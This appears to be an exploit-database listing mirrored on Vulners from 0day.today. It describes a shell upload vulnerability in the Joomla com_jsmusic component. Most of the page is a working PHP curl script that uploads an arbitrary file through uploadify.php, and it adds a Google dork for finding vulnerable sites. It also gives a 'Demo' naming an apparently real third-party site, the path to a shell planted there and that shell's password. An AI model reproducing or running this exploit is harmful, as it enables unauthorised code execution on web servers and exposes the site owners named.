Lucene search
K

Joomla Component com_jsmusic shell upload Vulnerability

🗓️ 30 Nov 2012 00:00:00Reported by Zikou-16Type 
zdt
 zdt
🔗 0day.today👁 66 Views

Joomla com_jsmusic component shell upload vulnerability via uploadify.ph

Code
-------------------------------------------------------------------------------
          Joomla Component com_jsmusic shell upload Vulnerability
 --------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"com_jsmusic"
#
#######################################################################################

Exploit : uploadshell.php
<?php

$uploadfile="dz.php";

$ch = curl_init("http://localhost/components/com_jsmusic/js/uploadify/uploadify.php?folder=/components/com_jsmusic/js/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
Shell Access : http://localhost/components/com_jsmusic/js/dz.php

<?php
phpinfo();
?>

#######################################################################################
#
# Demo : http://www.bsbmusical.com/professor/components/com_jsmusic/js/uploadify/uploadify.php
#
# Shell: http://www.bsbmusical.com/professor/components/com_jsmusic/js/x.php
#                                     _____________________
#                                     Shell password => dz0
#                                     _____________________
#######################################################################################

#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Nov 2012 00:00Current
7.1High risk
Vulners AI Score7.1
66